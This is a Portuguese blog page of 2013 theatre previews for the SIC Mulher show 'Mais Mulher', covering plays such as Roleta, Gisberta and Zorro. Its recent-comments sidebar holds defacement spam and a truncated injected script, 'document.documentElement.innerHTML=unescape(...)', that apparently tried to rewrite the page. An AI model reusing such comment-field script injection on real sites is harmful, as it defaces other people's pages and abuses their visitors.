oqueaconteceporai @ 17:35

Sex, 24/05/13

A 23 de Maio estreia, no Teatro Turim, Roleta de Eric L da Silva, uma encenação de Rosa Villa, com interpretação de Eric L da Silva, Gonçalo Oliveira, Hugo Costa Ramos, Rosa Villa, Sofia Arruda e Sofia Nicholson. Roleta está em cena de quinta a domingo às 21h30 até 9 de Junho.

 

ROLETA, uma comédia de Eric L. da Silva com encenação de Rosa Villa põe a nu as fragilidades humanas, reveladas por seis estranhos com um único amigo em comum. Perante a morte deste, um encontro "casual" vai levá-los a situações limite e fazê-los acreditar que nada têm a perder em jogar os jogos mais perversos. Um encontro alucinante que promete envolver o público num misto de emoções e gargalhadas. Conta com interpretação de Eric L da Silva, Gonçalo Oliveira, Hugo Costa Ramos, Rosa Villa, Sofia Arruda e Sofia Nicholson.

 

Sinopse - Receita para Desastre: 1 Excêntrico falecido, 1 Desejo final, 6 Estranhos, 1 Revolver, 12 Balas, Muita Droga, Irresponsabilidade q.b. … E um urso? Quando seis voláteis desconhecidos com nada a perder juntam-se para celebrar a vida de um amigo falecido; tudo que pode, vai correr mal, sobretudo quando as celebrações escalam à altura dos egos deles. Tudo que um pode fazer… É rir para não chorar.

 


Tags:


oqueaconteceporai @ 18:34

Qui, 09/05/13

Pela primeira vez na sua carreira, Rita Ribeiro estará a interpretar um monólogo.

A história de uma mãe que perdeu o seu filho, brutalmente assassinado por 14 adolescentes, no ano de 2006, na cidade do Porto. Gisberta era uma transexual que sofreu todo o tipo de preconceito e acabou por ser morta após três dias consecutivos de uma violência física e moral sem precedentes em Portugal.
O texto de "GISBERTA" é em parte ficcional. Tendo como base a história real do hediondo assassinato da transexual Gisberta, o relato da personagem da mãe acentua a dificuldade em aceitar as diferenças, os dogmas da igreja, enquanto instituição que castra a liberdade das escolhas que não seguem os padrões por ela instituídos, a solidão, os medos, a deceção... mas acima de tudo o amor desta mãe, que só não é incondicional, por estar escravizado aos preceitos sociais e religiosos e a complexidade de compreensão quanto a identidade de género.

“GISBERTA” obedece ao conceito das peças apresentadas no Teatro Rápido. Duração de 15 minutos, sendo apresentada em 5 sessões diárias de quinta a segunda-feira. Segue ainda o conceito de serem espetáculos com temas que se alteram mensalmente.

“GISBERTA” insere-se no tema do mês de Maio: “Mater”.

E por isso já sabe, não deixe de estar atento ao melhor roteiro, no Mais Mulher desta segunda-feira, às 17:30 na SIC Mulher!


Tags:


Tecnologia de Bolso @ 18:32

Seg, 22/04/13

"Irmã Lúcia - uma oração" é uma homenagem teatral a Lúcia de Jesus, a vidente de Fátima que testemunhou, junto com os primos Jacinta e Francisco, as aparições de Nossa Senhora na Cova da Iria.

 

O monólogo dá voz à religiosa, que se resguardou dos olhares do público e dos devotos de Nossa Senhora de Fátima, no Carmelo de Coimbra por um período de clausura superior a cinco décadas, focando no período em que, junto com a surpresa das aparições, teve de lidar com as consequências do que havia testemunhado.

 

Este é o terceiro espetáculo de uma trilogia biográfica no feminino na qual a atriz interpreta três mulheres portuguesas que se destacaram em áreas distintas. Maria Helena Vieira da Silva na pintura, Amália Rodrigues no canto e agora Irmã Lúcia na religião.

 

Uma peça e uma obra a não perder, no Mais Mulher desta terça-feira, às 17:30 na SIC Mulher!

E se não viu. Veja o vídeo aqui!

 


Tags:


oqueaconteceporai @ 18:31

Seg, 22/04/13

Estreiou em Novembro de 2011 no Teatro A Barraca, um Monólogo Cómico sobre as mulheres e as suas relações intitulado "Vamos lá Perceber as Mulheres... Mas só um bocadinho", esgotando a bilheteira logo a partir do 2º dia de atuação.

Em Fevereiro de 2012 o seu monólogo passa para o cinema S. Jorge, onde, até hoje, tem esgotado sempre a sala e desde Abril de 2012 apresenta-se com regularidade no teatro Confluência, em Cascais, também com salas sempre esgotadas.

 

Um espetáculo que coloca questões tais como:


Será que as mulheres ficam mesmo, mesmo felizes quando têm um filho?  


Não há nada como crianças com um nadinha de febre. Aquele 37.8º que não chega para nos maçar a termos de ir para o hospital, mas que as mantém assim paradas, mortiças, um amor.


Quando é que os homens vão aprender que não é para dizer frases assim: «Relaxa querida.» ou «Estás mais calma?» Porque é que isto nos enerva tanto? Porque somos todas desequilibradas… mas achamos que ninguém sabe.   

Mais de 17.500 pessoas já viram esta peça que regressa, agora, aos palcos nacionais. E no Mais Mulher desta terça-feira vislumbramos um pouco deste monólogo, às 17:30 na SIC Mulher!

E se não viu. Veja o vídeo aqui!

 


Tags:


oqueaconteceporai @ 18:34

Qua, 20/03/13

Chove em Barcelona. Chove no Bairro Raval, antigo bairro Chino, local onde uma mescla imensa de povos e culturas se cruzam.


Chove no pequeno quarto de Lali, a prostituta, do chulo Carlos e de David, o cliente. Pessoas do Bairro a quem Pau Miró deu voz e transformou em personagens carregadas de sonhos e frustrações.

 

Em cena no Teatro Aloés de 26 de Março a 07 de Abril.

(Terça | quarta a sábado 21h30 e às domingo 16h)


Encenação de Jorge Silva
Interpretação de Anna Eremin, João de Brito e Luís Barros.

 

M16 - Bilhete normal: 5€ (sujeito a descontos)

 

Teatro dos Aloés www.teatrodosaloes.pt.

 

A não perder, no Mais Mulher desta quinta-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




Tags:


oqueaconteceporai @ 18:31

Seg, 18/03/13

Um espetáculo musical que conta a história do lendário herói de máscara e espada. Projeto que reúne perto de 100 elementos, com um elenco de 18 atores e cantores, um cenário grandioso, figurinos de época, um investimento improvável em iluminação, som e sonoplastia, numa das mais emblemáticas salas do país, o Teatro Rivoli. São fatores que fazem de ZORRO um espetáculo imperdível!

ZORRO estrou na noite de carnaval com o Teatro Rivoli completamente esgotado! Em apenas 12 dias mais de 10.000 pessoas, entre miúdos e graúdos, aplaudiram bem alto este novo musical.

 

Esta é uma história sobre o herói que existe em cada um de nós, sobre a capacidade de aprender, de lutar por objetivos, de reerguer uma casa pela base quando o telhado cede.

Ao contrário de outros heróis, Zorro conquista a capa e a mascarilha não por magia ou mutações genéticas, mas porque se torna merecedor, por defender a honra de uma população, pela sua generosidade, esforço, e por descobrir que um herói não é só herói pelos outros mas COM os outros.

 

Começa mais um dia na Vila Garcia. Os habitantes enchem a praça de flores, de frutas, de especiarias. A alegria da manhã vem com o sol e os pregões dos vendedores. Mas eis que surgem os guardas de Dom Miguel, o governante da região, anunciando o corte ao acesso do poço que existe na Colina, a sua mansão. Em tempo de seca, quando a água se torna cada vez mais escassa e com o caminho para o poço vedado, como vão conseguir os Garcias continuar a manter as suas plantações e a fazer crescer a Vila?


É então que surge Zorro, o mais amado dos justiceiros. Zorro vem para acalmar a Vila, com a promessa de um futuro melhor. Acontece que Zorro está velho e cansado. As suas pernas já falham, e decide que é chegada a altura de treinar alguém para o substituir.


Mas quem? De entre todos os Garcias há apenas um rapaz franzino que se sobressai, pelos seus valores morais, pela sua honestidade. Mas este rapaz, Sancho, tem alguns receios e faz com que esse medo o impeça de seguir em frente na missão de auxiliar a Vila Garcia. Ao mesmo tempo, Dom Miguel descobre que há uma mina de ouro na Vila e o seu plano é precisamente tirar os Garcias das suas terras, para poder desenterrar esse ouro, enriquecendo ainda mais. Os Garcias, sem água, têm então de abandonar a Vila. Mas Sancho, empenhado em ajudar e movido pelo amor à sua terra, aceita finalmente vestir a capa e a mascarilha de Zorro e defender a população de Garcia.

 

Decidido a enfrentar Dom Miguel e a convencê-lo a voltar a deixar a população aceder à àgua do poço da Colina, apercebe-se que, pela iniciativa, pela coragem, pela justiça com que lida com os problemas, se está a transformar num herói de verdade.

 

Uma peça a não perder no Mais Mulher desta terça-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 






Tags:


oqueaconteceporai @ 18:33

Qua, 13/03/13

O Teatro Rápido em Março abre portas com a oferta ao público de 4 micropeças ao final da tarde, 1 micropeça para a Infância nas manhãs de sábados e domingos, 1 Exposição de Fotografia em homenagem a Espaços Teatrais e ainda vários eventos no TR BAR.

Contrariando o hábito de nos encontrarmos encerrados às 4ªs, celebraremos o Dia Mundial do Teatro, a 27 de Março, abrindo portas nesse dia para 2 sessões por cada sala TR em horário noturno, entre as 21h30 e as 22h20 4 salas, 2 sessões por sala!

O tema de Março é EM NOME DO PAI! E que nos traz uma diversificada e divertida proposta de programação:

Mulheres que em nome de um pai, gritam.
Uma Bíblia que “em nome do pai” se escreveu e se brinca.
Homens cujas ações são levadas a cabo em nome dos (respetivos) pais. Pais cujas existências são questionadas, dando lugar a uma reflexão sobre caminhos escolhidos.
E ainda uma party em formato de discoperformance liderada por um homo machina.

Albano Jerónimo estreia-se no TR num espetáculo com texto e conceção de Cláudia Lucas Chéu. Eric L da Silva assinala o seu regresso ao TR enquanto ator e encenador ao lado de Gonçalo Oliveira, tendo numa das salas vizinhas dois jovens atores, Miguel Ponte e Ricardo Tavares que contarão com o apoio à encenação de Marcantonio Del Carlo.

Joana Paes de Freitas ao lado Catarina Aidos e Catarina Campos Costa, trazem-nos uma criação coletiva.
Com uma proposta para a infância A. Branco volta a escrever para uma criação com Pedro Oliveira e Sabrina Martinho.

 

As peças a que pode assistir são:

 

- "Folhas, e não Credos";
- "Exorcismo: Uma História de Amor";
- "Submersas";
- "Europa, Ich Liebe Dich";
- "Duas Margens"

E não deixe de visitar o blog do TR e consulte a programação.

http://teatrorapido.blogspot.pt/

 

Por isso não deixe escapar e este mês e vá ao teatro! E não perca o Mais Mulher desta quinta-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


oqueaconteceporai @ 18:30

Qua, 06/03/13

Custódia Gallego, Filipe Duarte, João Cabral, Lúcia Moniz, Manuel Cavaco e Sofia Nicholson, foram desafiados pelo arrojo e pela saudade de palco. O convite de Renato Godinho, que encena o espectáculo, proporcionou uma inesperada comunhão de vontades e desejos que levou este maravilhoso grupo de actores a pegar numa história de Yasmina Reza, a primeira que escreveu para Teatro, e a viverem uma família de personagens à procura de paz.

 

Contrastando com a busca familiar que caracteriza o enredo da peça, está a determinação das pessoas que dão vida a este projecto em contrariar o cinzentismo teimoso e o conformismo viral. Sem subsídios, sem uma grande produtora por trás, mas com a inabalável determinação de quem sabe o que quer, e ama o que faz.

 

Este é a história de “Conversas Depois de um Enterro”: O patriarca Simão Aguilar faleceu, e, de acordo com os seus desejos, acaba de ser enterrado, não ao lado da sua mulher, no cemitério, mas nas suas próprias terras.

 

Reunidos estão os três filhos, todos nos seus quarenta anos: Jaime (joão Cabral), Edite (Sofia Nicholson) e Alex (Filipe Duarte). Também lá estão Pedro (Manuel Cavaco), o tio do lado da mãe, e a sua mulher, Júlia (Custódia Gallego), bem como Elisa (Lúcia Moniz). Elisa é a “outsider” apesar de ter sido namorada de Alex, quem ela amava realmente era o seu irmão Jaime. O que se desenrola a partir daqui, é um enredo familiar, com muitos momentos de humor. Há as tensões que são expectáveis em qualquer reunião de família, e os esforços para chegar a termos.

 

Com o passado, presente e futuro. Ao pai é dado o descanso, mas a sua presença ainda é sentida. À medida que alguns factos inesperados são revelados, a imagem que a família tinha do pai, transforma-se. É aqui onde os valores familiares são construídos, que o vazio deixado pelo falecido dá lugar à comunhão por que todos ansiavam há muito.

 

“Conversas Depois de um Enterro”, de Yasmina Reza, é apresentado pelo Montepio, tem encenação de Renato Godinho, e interpretação de Custódia Gallego, Filipe Duarte, João Cabral, Lúcia Moniz, Manuel Cavaco e Sofia Nicholson e estará em cena de 1 a 17 de Março no Teatro Municipal Mirita Casimiro, no Estoril, de onde partirá para uma digressão pelo país.

 

Os espectáculos são de 5ª a Sábado às 21h30 e Domingo às 16h. Os bilhetes estão à venda nos locais habituais com o preço a variar entre os 10 e os 15€.

 

Por isso já sabe! Não perca esta antevisão com Renato Godinho, Sofia Nicholson e Custódia Gallego. No Mais Mulher desta quinta-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


oqueaconteceporai @ 18:35

Qua, 13/02/13

No mês em que se comemora o Dia de São Valentim, o Teatro Rápido oferece-lhe quatro peças de 15 minutos para ser apaixonar. Sob o tema de Por Amor, tudo aqui vai ser permitido. Porque ninguém gosta de estar sozinho, porque todos sonham em encontrar a outra metade da laranja.

 

O problema é quando os sonhos se tornam realidade. Sim! Porque às vezes os sonhos concretizados revelam ser o maior problema…

 

Curiosa!?! Então não perca o Mais Mulher desta quinta-feira, às 17:30 na SIC Mulher.

 

Com Tiago Torres da Silva e Rosa Maria Villa!

 

Mas se não viu. Veja o vídeo aqui!

 


Tags:


oqueaconteceporai @ 00:04

Qui, 07/02/13

Simplesmente Maria é um espectáculo criado a partir do universo radiofónico dos anos 70 e inspirado nos folhetins de rádio-teatro. Conta a história de Maria, rapariga da província que leva uma vida feita de amor, luta, desgosto e de grandes conquistas.

 

Cruzando esta trama radiofónica com o quotidiano da época, através das histórias ficcionadas dos atores que a interpretam. São, por isso, frequentes as referências a este género teatral e as suas técnicas, nomeadamente as de sonoplastia que são executadas ao vivo e ao período que antecedeu o 25 de Abril. Com este espectáculo devolve-se à memória colectiva um momento que transportará o espectador para um Portugal não muito distante, transformando espectadores de teatro em ouvintes e ouvintes em espectadores de teatro.

 

Simplesmente Maria, não representa o folhetim de sucesso da altura, mas é antes uma viagem ao tempo do teatro radiofónico, do ié-ié, das vozes, da Lambretta, do Parque Mayer, das tertúlias, do Ultramar, e de um Portugal que, vivendo amarrado a uma ditadura, encontrava forma de continuar a respirar até se libertar.

 

Uma história a não perder no Mais Mulher desta quinta-feira, às 17:30, na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO